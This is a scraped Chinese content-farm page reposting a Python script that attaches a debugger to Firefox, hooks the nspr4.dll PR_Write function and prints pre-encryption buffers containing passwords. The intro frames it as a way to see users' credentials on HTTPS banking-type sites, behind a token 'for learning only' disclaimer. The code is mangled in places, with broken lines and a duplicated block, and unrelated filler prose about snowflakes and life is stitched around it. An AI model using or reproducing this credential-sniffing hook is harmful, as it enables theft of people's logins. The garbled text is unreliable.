热搜： Python PHP vue dedecms 编程

python利用hook技术破解https的实例代码

发布时间：2024-04-27 23:17:38 来源：互联网

.

在放大镜下，你可以看到每一片雪花都是一幅幅精美的图案：有的是晶莹的薄片，有的像白亮的银针，有的像一把张开的小扇，有的像夜空的星星……

相对于http协议，http是的特点就是他的安全性，http协议的通信内容用普通的嗅探器可以捕捉到，但是https协议的内容嗅探到的是加密后的内容，对我们的利用价值不是很高，所以一些大的网站----涉及到“大米”的网站，采用的都是http是协议，嘿嘿，即便这样，还是有办法能看到他的用户名和密码的，嘿嘿，本文只是用于技术学习，只是和大家交流技术，希望不要用于做违法的事情，这个例子是在firefox浏览器下登录https协议的网站，我们预先打开程序，就来了个捕获用户名和密码：

下面是源代码：


#!/ur/bin/env python 
from pydbg import *
from pydbg.defines import *import utils 
import sys dbg = pydbg() 
found_firefox = Falsepattern = "password" 
def ssl_sniff( dbg, args ): 
 buffer = "" 
 offset = 0 while 1: 
 byte = dbg.read_process_memory( args[1] + offset, 1 ) 
 if byte != "x00": 
 buffer += byte 
 offset += 1
 continue
 else: 
 break
 if pattern in buffer: 
 print "Pre-Encrypted: %s" % buffer
 return DBG_CONTINUE 
# 寻找firefox.exe的进程 
for (pid, name) in dbg.enumerate_processes(): 
 if name.lower() == "firefox.exe": 
 found_firefox = True
 hooks = utils.hook_container() 
 dbg.attach(pid) 
 print "[*] Attaching to firefox.exe with PID: %d" % pid 
# 得到firefox的hook的 address 
 hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write") 
 if hook_address: 
# 添加hook的内容，包括他的pid，地址，嗅探类型  hooks.add( dbg, hook_address, 2, ssl_sniff, None ) 
 print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address 
 break
 else: 
 print "[*] Error: Couldn't resolve hook address."
 sys.exit(-1) 
 if found_firefox: 
 print "[*] Hooks set, continuing process."
 dbg.run() 
 else: 
 print "[*] Error: Couldn't find the firefox.exe process."
 sys.exit(-1) if found_firefox: 
 print "[*] Hooks set, continuing process."
 dbg.run() 
else: 
 print "[*] Error: Couldn't find the firefox.exe process."
 sys.exit(-1)

转自：http://world77.blog.51cto.com/414605/518679

以上就是python利用hook技术破解https的实例代码。生活的真谛在于创新，生活的理想在于远大，生活的艺术在于选择，生活的步履在于踏实，生活的乐趣在于追求，生活的安乐在于平淡，人生有时就是一场戏，有高潮，有低谷，每个人在这场戏中的角色是不同的，有的人是主角，有的人是配角，并不是主角就一定有好戏，配角也有出彩的时候，与人相处，追求和谐，就如水一样，无形却能演变五彩缤纷，无味却能演绎万味俱佳。更多关于python利用hook技术破解https的实例代码请关注haodaima.com其它相关文章！

以下您可能有感兴趣的文章:

标签： python hook